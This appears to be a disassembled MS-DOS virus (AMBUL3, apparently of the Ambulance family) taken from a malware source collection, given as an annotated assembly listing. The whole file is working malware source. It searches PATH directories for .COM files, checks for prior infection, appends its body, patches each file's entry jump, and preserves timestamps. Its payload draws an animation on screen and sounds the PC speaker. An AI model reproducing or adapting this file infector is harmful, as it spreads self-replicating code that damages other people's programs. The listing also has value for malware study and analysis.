MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.ambul3.asm
2021-01-12 17:29:01 -06:00

391 lines
16 KiB
NASM

;NAME: AMBUL3.C-M
;FILE SIZE: 00330h - 816d
;START (CS:IP): 00100h
;CODE END: 00430h
;CODE ORIGIN: 00100h
;DATE: Sun Aug 16 15:45:06 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
H00100: JMP H00114 ;00100 E91100 ___
;Will be overwritten with B4 09 BA-- MOV AH,09 and MOV DX
;---------------------------------------------------
OR [BX+DI],AX ;00103 0901 __
;DX gets this, location of string.
INT 21h ;Indef_INT:21h-AH ;00105 CD21 _!
INT 20h ;B-TERM_norm:20h ;00107 CD20 _
;---------------------------------------------------
DB "Infect me!$" ;00109 496E6665637420
;---------------------------------------------------
H00114: CALL H00118 ; . . . . . . . . . ;00114 E80100 ___
ADD [BP-7Fh],BX ;00117 015E81 _^_
OUT DX,AL ;Port_OUT:DX ;0011A EE _
ADD AX,[BX+DI] ;0011B 0301 __
CALL H0013A ; . . . . . . . . . ;0011D E81A00 ___
CALL H0013A ; . . . . . . . . . ;00120 E81700 ___
CALL H002F8 ; . . . . . . . . . ;00123 E8D201 ___
LEA BX,[SI+0419h] ;00126 8D9C1904 ____
MOV DI,0100h ;0012A BF0001 ___
MOV AL,[BX] ;0012D 8A07 __
MOV [DI],AL ;0012F 8805 __
MOV AX,[BX+01h] ;00131 8B4701 _G_
MOV [DI+01h],AX ;00134 894501 _E_
JMP DI ;00137 FFE7 __
;---------------------------------------------------
RET ;RET_Near ;00139 C3 _
;---------------------------------------------------
H0013A: CALL H0021B ; . . . . . . . . . ;0013A E8DE00 ___
MOV AL,[SI+0428h] ;0013D 8A842804 __(_
OR AL,AL ;00141 0AC0 __
JZ H00139 ;00143 74F4 t_
LEA BX,[SI+040Fh] ;00145 8D9C0F04 ____
INC Word Ptr [BX] ;00149 FF07 __
LEA DX,[SI+0428h] ;0014B 8D942804 __(_
MOV AX,3D02h ;0014F B8023D __=
INT 21h ;2-Open_Fl_Hdl ;00152 CD21 _!
MOV [SI+0417h],AX ;00154 89841704 ____
MOV BX,[SI+0417h] ;00158 8B9C1704 ____
MOV CX,0003h ;0015C B90300 ___
LEA DX,[SI+0414h] ;0015F 8D941404 ____
MOV AH,3Fh ;00163 B43F _?
INT 21h ;2-Rd_Fl_Hdl ;00165 CD21 _!
MOV AL,[SI+0414h] ;00167 8A841404 ____
CMP AL,0E9h ;0016B 3CE9 <_
JNZ H001AE ;0016D 753F u?
MOV DX,[SI+0415h] ;0016F 8B941504 ____
MOV BX,[SI+0417h] ;00173 8B9C1704 ____
ADD DX,+03h ;00177 83C203 ___
XOR CX,CX ;0017A 33C9 3_
MOV AX,4200h ;0017C B80042 __B
INT 21h ;2-Mov_Fl_Hdl_Ptr ;0017F CD21 _!
MOV BX,[SI+0417h] ;00181 8B9C1704 ____
MOV CX,0006h ;00185 B90600 ___
LEA DX,[SI+041Ch] ;00188 8D941C04 ____
MOV AH,3Fh ;0018C B43F _?
INT 21h ;2-Rd_Fl_Hdl ;0018E CD21 _!
MOV AX,[SI+041Ch] ;00190 8B841C04 ____
MOV BX,[SI+041Eh] ;00194 8B9C1E04 ____
MOV CX,[SI+0420h] ;00198 8B8C2004 __ _
CMP AX,[SI+0100h] ;0019C 3B840001 ;___
JNZ H001AE ;001A0 750C u_
CMP BX,[SI+0102h] ;001A2 3B9C0201 ;___
JNZ H001AE ;001A6 7506 u_
CMP CX,[SI+0104h] ;001A8 3B8C0401 ;___
JZ H00212 ;001AC 7464 td
H001AE: MOV BX,[SI+0417h] ;001AE 8B9C1704 ____
XOR CX,CX ;001B2 33C9 3_
XOR DX,DX ;001B4 33D2 3_
MOV AX,4202h ;001B6 B80242 __B
INT 21h ;2-Mov_Fl_Hdl_Ptr ;001B9 CD21 _!
SUB AX,0003h ;001BB 2D0300 -__
MOV [SI+0412h],AX ;001BE 89841204 ____
MOV BX,[SI+0417h] ;001C2 8B9C1704 ____
MOV AX,5700h ;001C6 B80057 __W
INT 21h ;2-Fl_Hdl_Date_Time ;001C9 CD21 _!
PUSH CX ;001CB 51 Q
PUSH DX ;001CC 52 R
MOV BX,[SI+0417h] ;001CD 8B9C1704 ____
MOV CX,0319h ;001D1 B91903 ___
LEA DX,[SI+0100h] ;001D4 8D940001 ____
MOV AH,40h ;001D8 B440 _@
INT 21h ;2-Wr_Fl_Hdl ;001DA CD21 _!
MOV BX,[SI+0417h] ;001DC 8B9C1704 ____
MOV CX,0003h ;001E0 B90300 ___
LEA DX,[SI+0414h] ;001E3 8D941404 ____
MOV AH,40h ;001E7 B440 _@
INT 21h ;2-Wr_Fl_Hdl ;001E9 CD21 _!
MOV BX,[SI+0417h] ;001EB 8B9C1704 ____
XOR CX,CX ;001EF 33C9 3_
XOR DX,DX ;001F1 33D2 3_
MOV AX,4200h ;001F3 B80042 __B
INT 21h ;2-Mov_Fl_Hdl_Ptr ;001F6 CD21 _!
MOV BX,[SI+0417h] ;001F8 8B9C1704 ____
MOV CX,0003h ;001FC B90300 ___
LEA DX,[SI+0411h] ;001FF 8D941104 ____
MOV AH,40h ;00203 B440 _@
INT 21h ;2-Wr_Fl_Hdl ;00205 CD21 _!
POP DX ;00207 5A Z
POP CX ;00208 59 Y
MOV BX,[SI+0417h] ;00209 8B9C1704 ____
MOV AX,5701h ;0020D B80157 __W
INT 21h ;2-Fl_Hdl_Date_Time ;00210 CD21 _!
H00212: MOV BX,[SI+0417h] ;00212 8B9C1704 ____
MOV AH,3Eh ;00216 B43E _>
INT 21h ;2-Close_Fl_Hdl ;00218 CD21 _!
RET ;RET_Near ;0021A C3 _
;---------------------------------------------------
H0021B: MOV AX,DS:[002Ch] ;0021B A12C00 _,_
MOV ES,AX ;ES_Chg ;0021E 8EC0 __
PUSH DS ;00220 1E _
MOV AX,0040h ;00221 B84000 _@_
MOV DS,AX ;DS_Chg ;00224 8ED8 __
MOV BP,DS:[006Ch] ;00226 8B2E6C00 _.l_
POP DS ;0022A 1F _
TEST BP,0003h ;0022B F7C50300 ____
JZ H00248 ;0022F 7417 t_
XOR BX,BX ;00231 33DB 3_
MOV AX,ES:[BX] ;ES_Ovrd ;00233 268B07 &__
CMP AX,4150h ;00236 3D5041 =PA
JNZ H00243 ;00239 7508 u_
CMP Word Ptr ES:[BX+02h],4854h
;ES_Ovrd ;0023B 26817F025448 &___TH
JZ H0024E ;00241 740B t_
H00243: INC BX ;00243 43 C
OR AX,AX ;00244 0BC0 __
JNZ H00233 ;00246 75EB u_
H00248: LEA DI,[SI+0428h] ;00248 8DBC2804 __(_
JMP Short H00280 ;0024C EB32 _2
;---------------------------------------------------
H0024E: ADD BX,+05h ;0024E 83C305 ___
LEA DI,[SI+0428h] ;00251 8DBC2804 __(_
MOV AL,ES:[BX] ;ES_Ovrd ;00255 268A07 &__
INC BX ;00258 43 C
OR AL,AL ;00259 0AC0 __
JZ H00276 ;0025B 7419 t_
CMP AL,3Bh ;0025D 3C3B <;
JZ H00266 ;0025F 7405 t_
MOV [DI],AL ;00261 8805 __
INC DI ;00263 47 G
JMP Short H00255 ;00264 EBEF __
;---------------------------------------------------
H00266: CMP Byte Ptr ES:[BX],00h
;ES_Ovrd ;00266 26803F00 &_?_
JZ H00276 ;0026A 740A t_
SHR BP,1 ;0026C D1ED __
SHR BP,1 ;0026E D1ED __
TEST BP,0003h ;00270 F7C50300 ____
JNZ H00251 ;00274 75DB u_
H00276: CMP Byte Ptr [DI-01h],5Ch ;00276 807DFF5C _}_\
JZ H00280 ;0027A 7404 t_
MOV Byte Ptr [DI],5Ch ;0027C C6055C __\
INC DI ;0027F 47 G
H00280: PUSH DS ;00280 1E _
POP ES ;00281 07 _
MOV [SI+0422h],DI ;00282 89BC2204 __"_
;********* Put "*.COM" at ES:DI
MOV AX,2E2Ah ;00286 B82A2E _*.
STOSW ;00289 AB _
MOV AX,4F43h ;0028A B8434F _CO
STOSW ;0028D AB _
MOV AX,004Dh ;0028E B84D00 _M_
STOSW ;00291 AB _
;**********
PUSH ES ;00292 06 _
MOV AH,2Fh ;00293 B42F _/
INT 21h ;2-Get_DTA ;00295 CD21 _!
MOV AX,ES ;00297 8CC0 __
MOV [SI+0424h],AX ;00299 89842404 __$_
MOV [SI+0426h],BX ;0029D 899C2604 __&_
POP ES ;002A1 07 _
LEA DX,[SI+0478h] ;002A2 8D947804 __x_
MOV AH,1Ah ;002A6 B41A __
INT 21h ;1-Set_DTA ;002A8 CD21 _!
LEA DX,[SI+0428h] ;002AA 8D942804 __(_
XOR CX,CX ;002AE 33C9 3_
MOV AH,4Eh ;002B0 B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;002B2 CD21 _!
JNB H002BE ;002B4 7308 s_
XOR AX,AX ;002B6 33C0 3_
MOV [SI+0428h],AX ;002B8 89842804 __(_
JMP Short H002E7 ;002BC EB29 _)
;---------------------------------------------------
H002BE: PUSH DS ;002BE 1E _
MOV AX,0040h ;002BF B84000 _@_
MOV DS,AX ;DS_Chg ;002C2 8ED8 __
ROR BP,1 ;002C4 D1CD __
XOR BP,DS:[006Ch] ;002C6 332E6C00 3.l_
POP DS ;002CA 1F _
TEST BP,0007h ;002CB F7C50700 ____
JZ H002D7 ;002CF 7406 t_
MOV AH,4Fh ;002D1 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;002D3 CD21 _!
JNB H002BE ;002D5 73E7 s_
H002D7: MOV DI,[SI+0422h] ;002D7 8BBC2204 __"_
LEA BX,[SI+0496h] ;002DB 8D9C9604 ____
MOV AL,[BX] ;002DF 8A07 __
INC BX ;002E1 43 C
STOSB ;002E2 AA _
OR AL,AL ;002E3 0AC0 __
JNZ H002DF ;002E5 75F8 u_
H002E7: MOV BX,[SI+0426h] ;002E7 8B9C2604 __&_
MOV AX,[SI+0424h] ;002EB 8B842404 __$_
PUSH DS ;002EF 1E _
MOV DS,AX ;DS_Chg ;002F0 8ED8 __
MOV AH,1Ah ;002F2 B41A __
INT 21h ;1-Set_DTA ;002F4 CD21 _!
POP DS ;002F6 1F _
RET ;RET_Near ;002F7 C3 _
;---------------------------------------------------
H002F8: PUSH ES ;002F8 06 _
MOV AX,[SI+040Fh] ;002F9 8B840F04 ____
AND AX,0007h ;002FD 250700 %__
CMP AX,0006h ;00300 3D0600 =__
JNZ H0031A ;00303 7515 u_
MOV AX,0040h ;00305 B84000 _@_
MOV ES,AX ;ES_Chg ;00308 8EC0 __
MOV AX,ES:[000Ch] ;ES_Ovrd ;0030A 26A10C00 &___
OR AX,AX ;0030E 0BC0 __
JNZ H0031A ;00310 7508 u_
INC Word Ptr ES:[000Ch]
;ES_Ovrd ;00312 26FF060C00 &____
CALL H0031C ; . . . . . . . . . ;00317 E80200 ___
H0031A: POP ES ;0031A 07 _
RET ;RET_Near ;0031B C3 _
;---------------------------------------------------
H0031C: PUSH DS ;0031C 1E _
MOV DI,0B800h ;0031D BF00B8 ___
MOV AX,0040h ;00320 B84000 _@_
MOV DS,AX ;DS_Chg ;00323 8ED8 __
MOV AL,DS:[0049h] ;00325 A04900 _I_
CMP AL,07h ;00328 3C07 <_
JNZ H0032F ;0032A 7503 u_
MOV DI,0B000h ;0032C BF00B0 ___
H0032F: MOV ES,DI ;ES_Chg ;0032F 8EC7 __
POP DS ;00331 1F _
MOV BP,0FFF0h ;00332 BDF0FF ___
MOV DX,0000h ;00335 BA0000 ___
MOV CX,0010h ;00338 B91000 ___
CALL H0037D ; . . . . . . . . . ;0033B E83F00 _?_
INC DX ;0033E 42 B
LOOP H0033B ;0033F E2FA __
CALL H0035A ; . . . . . . . . . ;00341 E81600 ___
CALL H003C2 ; . . . . . . . . . ;00344 E87B00 _{_
INC BP ;00347 45 E
CMP BP,+50h ;00348 83FD50 __P
JNZ H00335 ;0034B 75E8 u_
CALL SILENC ; . . . . . . . . . ;0034D E80300 ___
PUSH DS ;00350 1E _
POP ES ;00351 07 _
RET ;RET_Near ;00352 C3 _
;---------------------------------------------------
;********** Silence speaker
SILENC: IN AL,61h ;Port_IN:61h ;00353 E461 _a
AND AL,0FCh ;00355 24FC $_
OUT 61h,AL ;Port_OUT:61h ;00357 E661 _a
RET ;RET_Near ;00359 C3 _
;---------------------------------------------------
H0035A: MOV DX,07D0h ;0035A BAD007 ___
TEST BP,0004h ;0035D F7C50400 ____
JZ H00366 ;00361 7403 t_
MOV DX,0BB8h ;00363 BAB80B ___
H00366: IN AL,61h ;Port_IN:61h ;00366 E461 _a
TEST AL,03h ;00368 A803 __
JNZ H00374 ;0036A 7508 u_
OR AL,03h ;0036C 0C03 __
OUT 61h,AL ;Port_OUT:61h ;0036E E661 _a
MOV AL,0B6h ;00370 B0B6 __
OUT 43h,AL ;Port_OUT:43h ;00372 E643 _C
H00374: MOV AX,DX ;00374 8BC2 __
OUT 42h,AL ;Port_OUT:42h ;00376 E642 _B
MOV AL,AH ;00378 88E0 __
OUT 42h,AL ;Port_OUT:42h ;0037A E642 _B
RET ;RET_Near ;0037C C3 _
;---------------------------------------------------
H0037D: PUSH CX ;0037D 51 Q
PUSH DX ;0037E 52 R
LEA BX,[SI+03BFh] ;0037F 8D9CBF03 ____
ADD BX,DX ;00383 03DA __
ADD DX,BP ;00385 01EA __
OR DX,DX ;00387 0BD2 __
JS H003BF ;00389 7834 x4
CMP DX,+50h ;0038B 83FA50 __P
JNB H003BF ;0038E 732F s/
MOV DI,0C80h ;00390 BF800C ___
ADD DI,DX ;00393 03FA __
ADD DI,DX ;00395 03FA __
SUB DX,BP ;00397 29EA )_
MOV CX,0005h ;00399 B90500 ___
MOV AH,07h ;0039C B407 __
MOV AL,[BX] ;0039E 8A07 __
SUB AL,07h ;003A0 2C07 ,_
ADD AL,CL ;003A2 02C1 __
SUB AL,DL ;003A4 28D0 (_
CMP CX,+05h ;003A6 83F905 ___
JNZ H003B5 ;003A9 750A u_
MOV AH,0Fh ;003AB B40F __
TEST BP,0003h ;003AD F7C50300 ____
JZ H003B5 ;003B1 7402 t_
MOV AL,20h ;003B3 B020 _
H003B5: STOSW ;003B5 AB _
ADD BX,+10h ;003B6 83C310 ___
ADD DI,009Eh ;003B9 81C79E00 ____
LOOP H0039C ;003BD E2DD __
H003BF: POP DX ;003BF 5A Z
POP CX ;003C0 59 Y
RET ;RET_Near ;003C1 C3 _
;---------------------------------------------------
H003C2: PUSH DS ;003C2 1E _
MOV AX,0040h ;003C3 B84000 _@_
MOV DS,AX ;DS_Chg ;003C6 8ED8 __
MOV AX,DS:[006Ch] ;003C8 A16C00 _l_
CMP AX,DS:[006Ch] ;003CB 3B066C00 ;_l_
JZ H003CB ;003CF 74FA t_
POP DS ;003D1 1F _
RET ;RET_Near ;003D2 C3 _
;---------------------------------------------------
DB '"' ;003D3 22
;---------------------------------------------------
AND SP,[SI] ;SP_Chg ;003D4 2324 #$
AND AX,2726h ;003D6 252627 %&'
SUB [BX+DI],CH ;003D9 2829 ()
DB 66h ;Indef_OP:66h ;003DB 66 f
;---------------------------------------------------
XCHG DI,[BP+DI] ;003DC 873B _;
SUB AX,2F2Eh ;003DE 2D2E2F -./
XOR [BX+DI],DH ;003E1 3031 01
AND SP,AX ;SP_Chg ;003E3 23E0 #_
LOOPZ H003C9 ;003E5 E1E2 __
JCXZ H003CD ;003E7 E3E4 __
IN AX,0E6h ;Port_IN:E6h ;003E9 E5E6 __
OUT 0E7h,AX ;Port_OUT:E7h ;003EB E7E7 __
JMP H0EFDA ;003ED E9EAEB ___
;---------------------------------------------------
XOR [BX+DI],DH ;003F0 3031 01
XOR AH,[SI] ;003F2 3224 2$
LOOPNZ H003D7 ;003F4 E0E1 __
LOOP H003DB ;003F6 E2E3 __
CALL H0EE25 ; . . . . . . . . . ;003F8 E82AEA _*_
OUT 0E8h,AX ;Port_OUT:E8h ;003FB E7E8 __
JMP H0342F ;003FD E92F30 _/0
;---------------------------------------------------
DB 6Dh ;286_INSW ;00400 6D m
;---------------------------------------------------
XOR DH,[BP+DI] ;00401 3233 23
AND AX,0E2E1h ;00403 25E1E2 %__
JCXZ H003EC ;00406 E3E4 __
IN AX,0E7h ;Port_IN:E7h ;00408 E5E7 __
OUT 0E8h,AX ;Port_OUT:E8h ;0040A E7E8 __
JMP H0EFF9 ;0040C E9EAEB ___
;---------------------------------------------------
IN AL,DX ;Port_IN:DX ;0040F EC _
IN AX,DX ;Port_IN:DX ;00410 ED _
OUT DX,AL ;Port_OUT:DX ;00411 EE _
OUT DX,AX ;Port_OUT:DX ;00412 EF _
OUT 0E7h,AL ;ES_Ovrd ;00413 26E6E7 &__
SUB [BX+DI+5Ah],BX ;00416 29595A )YZ
SUB AL,0ECh ;00419 2CEC ,_
IN AX,DX ;Port_IN:DX ;0041B ED _
OUT DX,AL ;Port_OUT:DX ;0041C EE _
OUT DX,AX ;Port_OUT:DX ;0041D EF _
DB 0F0h ;LOCK:F0h ;0041E F0 _
XOR AH,[BP+SI+34] ;0041F 326234 2b4
;---------------------------------------------------
HLT ;SYSTEM_HALT ;00422 F4 _
OR AL,[BX+SI] ;00423 0A00 __
JMP H00439 ;00425 E91100 ___
;---------------------------------------------------
DB 0B4h, 09h, 0BAh ;First three bytes ;00428
DB 05,00 ;Dunno ;0042B
DB 0B4h, 09h, 0BAh ;First three bytes ;0042D
;AGAIN! Wierd
P00100 ENDP
CODE ENDS
END H00100
;-------------------------------------------------------------------------------